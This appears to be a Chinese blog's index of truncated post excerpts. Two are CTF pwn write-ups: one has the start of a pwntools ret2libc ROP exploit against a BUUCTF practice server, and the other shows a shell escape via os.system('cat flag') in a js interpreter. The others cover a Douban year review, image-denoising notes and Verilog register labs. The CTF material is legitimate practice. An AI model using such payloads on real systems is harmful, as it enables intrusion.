Clerk.Max(well);

BUUCTF-PWN-bjdctf_2020_babyropchecksec IDA 又是基本的ret2libc EXP1234567891011121314151617181920212223242526272829from pwn import *from LibcSearcher import *context.log_level = 'debug'p = remote('node4.buuoj.cn', 25135)elf = ELF('./bjdctf_2020_babyrop')main_addr = elf.sym['main']rdi_ret = 0x400733ret = 0x4004c9puts_plt = elf.plt['puts']puts_got = elf.got['puts']payload1 = b'a' * (0x20 + 0x8) + p64(rdi_ret) + p64(puts_got) + p64(p ...

XCTF-PWN-monkey 知识笔记 pwntools调用动态链接库：p = process([process_name], env={'LD_LIBRARY_PATH':'./'}) 由于js解释器，可以使用函数os.system() 解题步骤12345678910111213141516171819ubuntu@LAPTOP-V4AB5SPG:/mnt/c/Users/19269$ nc 111.200.241.244 58615js> os.system(ls)os.system(ls)js> os.system('ls')os.system('ls')bindevflagjsliblib32lib64libnspr4.solibplc4.solibplds4.sorun.shjs> os.system('cat flag')os.system('cat flag')cyberpeace{4c208231f62200 ...

好想有人替我总结标题很怪，至少搜狗输入法是这么认为的，因为它会给我匹配到另外的字。 那我为啥会想写这样的文章啊？理由我也是说不明白，可能不是因为没什么好理由，而是没有什么重点的原因吧。但我很清楚，那根导火索是“豆瓣”。 （半个月没更新了，居然拿这种破文章出来） 豆瓣2021年度书影音报告先上图吧 先说一下，我一年里面看两百多部电影和80本书，是不可能的，只是我今年才开始用“豆瓣APP”标记书影音的功能罢了，它能标记“想看”“在看”和“已看”，所以在APP里看到我以前看过的电影，我就会把它标记一下。不过，我今年也看了蛮多电影的（暴露了不好好学习的事实，但反正这个博客的主题不就是假装学习，留点痕迹嘛）。 这个豆瓣2021年度书影音报告其实蛮长的，也可以看出豆瓣也很用心在做，所以就一下子让我有点“心律不齐”（手动狗头，直男是不会被打动的）。 从来就不喜欢记录和总结可能是从小就被每周要写的语文老师布置的周记/日记/小作文给恶心坏了。 记得当年小学初中的时候，是一直保持着周末先写完作业再玩的好习惯，ddl这种事情是不会发生在我身上的（那时我肯定想不到，最终会成为自己讨厌的人，手动狗头）。但是 ...

上周问题 每个3*3区域内的单个噪声点几乎完全消除，但是在像素修改上存在不合理的情况，比如在图像的明显分界线上，像素互相侵蚀。 出现这样情况的原因如下图，在不考虑中心点（黄色）的情况下，设红色像素点是噪声，那么这个3*3矩阵，满足1:7的划分状态，我们肯定能定位出红色的噪声点，但是在修改噪声的时候，会取蓝色区域内最接近于红色值的像素值来赋给红色像素点。 由于降噪算法的核心就是根据原有的合理像素值猜测出噪声值本来的样子，那么在不考虑四个边界的像素点情况下，每个像素点都有与它联系最紧密的8邻域像素，我称它们为最佳关联点。 当猜测噪声点的原值的时候，最佳关联点对它的影响越大，则猜的越准，那么刚才的修改方法就不太合适： 如图所示，该修改方法使用的红色像素点的最佳关联点只有四个，还有三个非最佳关联点，如果这个红色点在四个角上的话，那么，会使用到的最佳关联点只有两个，非最佳关联点有五个 由于该噪声定位的方法与以前先定位加权，再修改的方式不同，所以我们不能保证蓝色像素点部分没有噪声，只是因为红色的噪声更突出，所以分出来1:7的状态，那么在修改的时候，不可避免的会使用到比非最佳关联点还要不合理的 ...

移位寄存器设计实验 74LS198实验原理 实验步骤 实验代码1234567891011121314151617181920`timescale 1ns / 1psmodule reg_74LS198(CR_, CP, S1, S2, SR, SL, D, Q); input CR_, CP, S1, S2, SR, SL; input [7:0]D; output reg[7:0]Q; always @(posedge CP or negedge CR_) begin if(!CR_) Q <= 8'b0000_0000; else begin case({S1, S2}) 2'b00: Q <= Q; 2'b01: Q <= {SR, Q[7:1]}; 2'b10: Q <= {Q[6:0], SL}; ...

基本寄存器设计实验实验原理 实验步骤 实验代码1234567891011121314151617`timescale 1ns / 1psmodule register_8D(OE_, CLR, CLK, D, Q); input OE_, CLR, CLK; input [7:0]D; output [7:0]Q; reg [7:0]A; always @(posedge CLK or posedge CLR) begin if(CLR) A <= 8'b0000_0000; else A <= D; end assign Q = OE_ ? 8'bzzzz_zzzz : A;endmodule 板极验证使用的板卡型号：xc7a100tlcsg324-2L 123456789101112131415161718192021222324set_property -dict {IOSTANDARD LVCMOS18 PACKAGE_PIN V5} [get_ports ...

可逆计数器设计实验实验要求 实验步骤 74LS191模块代码123456789101112131415161718192021222324252627282930313233343536`timescale 1ns / 1psmodule cnt_74LS191(LD_, CT_, U_D, CP, D, Q, Max_Min, RCO_); input LD_, CT_, U_D, CP; input [3:0]D; output [3:0]Q; output Max_Min, RCO_; reg [3:0]Q; reg Max_Min; reg RCO_; always @(posedge CP or negedge LD_) begin if(!LD_) Q <= D; else if(CT_) Q <= Q; else begin if(!U_D) begin if(Q == 4'b1110) Max_Min < ...

上周问题 可以看出还有很多单个噪声点残留，那么需要修改噪声定位的部分。经过调试发现，问题出在寻找1:7情况的部分。 改进代码下面是修改后的代码： 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781 ...